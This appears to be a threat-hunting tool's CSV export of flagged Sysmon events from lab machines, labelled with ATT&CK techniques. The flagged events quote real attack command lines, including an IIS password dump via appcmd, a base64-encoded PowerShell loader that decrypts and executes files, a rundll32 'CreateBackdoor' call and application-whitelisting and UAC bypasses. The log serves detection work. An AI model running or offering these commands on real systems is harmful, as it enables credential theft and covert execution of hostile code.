",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1557670689.589507,2019-05-12T18:18:09.589507+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," 1 5 4 1 0 0x8000000000000000 16451 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-12 14:18:03.558 365ABB72-2B1B-5CD8-0000-0010CCC92500 3320 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" C:\Users\IEUser\ IEWIN7\IEUser 365ABB72-2523-5CD8-0000-00204C360100 0x1364c 1 Medium SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-252D-5CD8-0000-001019E20300 2800 C:\Windows\explorer.exe C:\Windows\Explorer.EXE ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1606412291.655964,2020-11-26T21:38:11.655964+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\windows\system32\cmd.exe" ),1," 1 5 4 1 0 0x8000000000000000 2362770 Microsoft-Windows-Sysmon/Operational LAPTOP-JU4M3I0E 2020-11-26 17:38:11.175 00247C92-E803-5FBF-0000-0010F2BFB40C 16980 C:\Windows\System32\cmd.exe 10.0.18362.449 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe "C:\windows\system32\cmd.exe" C:\windows\system32\ LAPTOP-JU4M3I0E\bouss 00247C92-3404-5FBE-0000-0020E0C90600 0x6c9e0 1 High SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18 00247C92-E803-5FBF-0000-0010CDB9B40C 17336 C:\Windows\System32\taskhostw.exe taskhostw.exe $(Arg0) ",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational [ T1059 ] wscript or cscript runing script,1560583325.973009,2019-06-15T11:22:05.973009+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run wscript or cscript with Command Line ("C:\Windows\System32\WScript.exe" "C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\updatevbs.vbs") and Parent Image :C:\Program Files\Internet Explorer\iexplore.exe , Parent CommandLine ("C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\IEUser\Downloads\updatevbs.html) in directory : ( C:\Users\IEUser\Desktop\ )",1," 1 5 4 1 0 0x8000000000000000 7681 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-06-15 07:22:05.660 365ABB72-9C9D-5D04-0000-001039CE1600 172 C:\Windows\System32\wscript.exe 5.8.7600.16385 Microsoft ® Windows Based Script Host Microsoft ® Windows Script Host Microsoft Corporation "C:\Windows\System32\WScript.exe" "C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\updatevbs.vbs" C:\Users\IEUser\Desktop\ IEWIN7\IEUser 365ABB72-98E4-5D04-0000-0020A4350100 0x135a4 1 High SHA1=C2752A6515D97D5906232828004BC54C587E6780,MD5=BA7AC4381D685354FF87E0553E950A4E,SHA256=BED1028BADEE2ADE8A8A8EDD25AA4C3E70A6BEEFAFBDFFD6426E5E467F24EB01,IMPHASH=317C8DE06F7AEE57A3ACF4722FE00983 365ABB72-9C8E-5D04-0000-0010D0421600 540 C:\Program Files\Internet Explorer\iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\IEUser\Downloads\updatevbs.html ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1564435993.225412,2019-07-30T01:33:13.225412+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll ),1," 1 5 4 1 0 0x8000000000000000 4900 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:33:13.169 747F3D96-6619-5D3F-0000-0010FDE78600 5116 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-6609-5D3F-0000-00109FBF8500 1208 C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1558920559.964573,2019-05-27T05:29:19.964573+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:password ),1," 1 5 4 1 0 0x8000000000000000 5973 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-27 01:29:19.924 365ABB72-3D6F-5CEB-0000-001072D7FF00 3640 C:\Windows\System32\inetsrv\appcmd.exe 7.5.7600.16385 (win7_rtm.090713-1255) Application Server Command Line Admin Tool Internet Information Services Microsoft Corporation "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:password C:\Windows\Temp\ IIS APPPOOL\DefaultAppPool 365ABB72-B26B-5CEA-0000-002023240800 0x82423 0 High SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 365ABB72-3D4A-5CEB-0000-0010FA93FD00 2584 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1564840229.461449,2019-08-03T17:50:29.461449+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," 1 5 4 1 0 0x8000000000000000 5523 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-08-03 13:50:28.662 747F3D96-9124-5D45-0000-00103B986101 6236 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-56A3-5D45-0000-0020B3D31800 0x18d3b3 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-9124-5D45-0000-001022926101 3180 C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe "C:\Users\IEUser\AppData\Local\Temp\fubuki.exe" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1564831398.715586,2019-08-03T15:23:18.715586+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," 1 5 4 1 0 0x8000000000000000 5407 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-08-03 11:23:17.636 747F3D96-6EA5-5D45-0000-001032CCE100 6068 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-D4E9-5D45-0000-0020E7030000 0x3e7 1 System SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-6EA5-5D45-0000-00107AC9E100 932 C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 6312 -ip 6312 ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1082] System Information Discovery,1558969963.990983,2019-05-27T19:12:43.990983+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami /groups ) ,1," 1 5 4 1 0 0x8000000000000000 6170 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-27 15:12:38.270 365ABB72-FE66-5CEB-0000-0010C7F80B00 1168 C:\Windows\System32\whoami.exe 6.1.7600.16385 (win7_rtm.090713-1255) whoami - displays logged on user information Microsoft® Windows® Operating System Microsoft Corporation whoami /groups C:\Windows\system32\ NT AUTHORITY\SYSTEM 365ABB72-7B40-5CEC-0000-0020E7030000 0x3e7 0 System SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 365ABB72-FE66-5CEB-0000-001058F50B00 3256 C:\Windows\System32\cmd.exe cmd.exe /c whoami /groups ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1628379198.562808,2021-08-08T03:33:18.562808+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM \system32\AppHostRegistrationVerifier.exe ),1," 1 5 4 1 0 0x8000000000000000 557006 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2021-08-07 23:33:15.285 747F3D96-183B-610F-0000-0010DC6CD400 11324 C:\Windows\System32\cmd.exe 10.0.17763.592 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM \system32\AppHostRegistrationVerifier.exe C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-1231-610F-0000-002057A80700 0x7a857 1 Medium SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 00000000-0000-0000-0000-000000000000 1108 ? ? ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1584766818.01845,2020-03-21T09:00:18.018450+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," 1 5 4 1 0 0x8000000000000000 243523 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-03-21 05:00:17.544 747F3D96-9F61-5E75-0000-001056711E00 7380 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 windowscoredeviceinfo.dll,CreateBackdoor C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-9DBA-5E75-0000-0020E7030000 0x3e7 0 System SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-9DBC-5E75-0000-00102C390100 1652 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766818.01845,2020-03-21T09:00:18.018450+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," 1 5 4 1 0 0x8000000000000000 243523 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-03-21 05:00:17.544 747F3D96-9F61-5E75-0000-001056711E00 7380 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 windowscoredeviceinfo.dll,CreateBackdoor C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-9DBA-5E75-0000-0020E7030000 0x3e7 0 System SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-9DBC-5E75-0000-00102C390100 1652 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [ T1086 ] Powershell with Suspicious Argument,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,"Found User (IEWIN7\IEUser) run Suspicious PowerShell commands that include (powershell,\Windows\System32) in event with Command Line ("C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe") and Parent Image :C:\Windows\System32\sysprep\sysprep.exe , Parent CommandLine ("C:\Windows\System32\sysprep\sysprep.exe") in directory : ( C:\Windows\system32\WindowsPowerShell\v1.0\ )",1," 1 5 4 1 0 0x8000000000000000 17729 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-14 02:32:51.728 365ABB72-28D3-5CDA-0000-001088C71300 3976 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 6.1.7600.16385 (win7_rtm.090713-1255) Windows PowerShell Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" C:\Windows\system32\WindowsPowerShell\v1.0\ IEWIN7\IEUser 365ABB72-26E1-5CDA-0000-002045350100 0x13545 1 High SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C 365ABB72-28D3-5CDA-0000-00106DC31300 3068 C:\Windows\System32\sysprep\sysprep.exe "C:\Windows\System32\sysprep\sysprep.exe" ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1085] Rundll32 Execution detected,1584766818.01845,2020-03-21T09:00:18.018450+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," 1 5 4 1 0 0x8000000000000000 243523 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-03-21 05:00:17.544 747F3D96-9F61-5E75-0000-001056711E00 7380 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 windowscoredeviceinfo.dll,CreateBackdoor C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-9DBA-5E75-0000-0020E7030000 0x3e7 0 System SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-9DBC-5E75-0000-00102C390100 1652 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1086] PowerShell Process found,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" ),1," 1 5 4 1 0 0x8000000000000000 17729 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-14 02:32:51.728 365ABB72-28D3-5CDA-0000-001088C71300 3976 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 6.1.7600.16385 (win7_rtm.090713-1255) Windows PowerShell Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" C:\Windows\system32\WindowsPowerShell\v1.0\ IEWIN7\IEUser 365ABB72-26E1-5CDA-0000-002045350100 0x13545 1 High SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C 365ABB72-28D3-5CDA-0000-00106DC31300 3068 C:\Windows\System32\sysprep\sysprep.exe "C:\Windows\System32\sysprep\sysprep.exe" ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1603490297.209324,2020-10-24T01:58:17.209324+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222)",1," 1 5 4 1 0 0x8000000000000000 424081 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-10-23 21:58:17.171 747F3D96-51F9-5F93-0000-001003125E00 7552 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-4690-5F93-0000-002019A60800 0x8a619 1 Medium SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 00000000-0000-0000-0000-000000000000 1216 ? ? ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1603490297.209324,2020-10-24T01:58:17.209324+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 )",1," 1 5 4 1 0 0x8000000000000000 424081 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-10-23 21:58:17.171 747F3D96-51F9-5F93-0000-001003125E00 7552 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-4690-5F93-0000-002019A60800 0x8a619 1 Medium SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 00000000-0000-0000-0000-000000000000 1216 ? ? ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1085] Rundll32 Execution detected,1603490297.209324,2020-10-24T01:58:17.209324+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 )",1," 1 5 4 1 0 0x8000000000000000 424081 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-10-23 21:58:17.171 747F3D96-51F9-5F93-0000-001003125E00 7552 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-4690-5F93-0000-002019A60800 0x8a619 1 Medium SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 00000000-0000-0000-0000-000000000000 1216 ? ? ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1558920559.894473,2019-05-27T05:29:19.894473+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:userName ),1," 1 5 4 1 0 0x8000000000000000 5970 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-27 01:29:19.834 365ABB72-3D6F-5CEB-0000-0010B2D3FF00 3848 C:\Windows\System32\inetsrv\appcmd.exe 7.5.7600.16385 (win7_rtm.090713-1255) Application Server Command Line Admin Tool Internet Information Services Microsoft Corporation "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:userName C:\Windows\Temp\ IIS APPPOOL\DefaultAppPool 365ABB72-B26B-5CEA-0000-002023240800 0x82423 0 High SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 365ABB72-3D4A-5CEB-0000-0010FA93FD00 2584 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 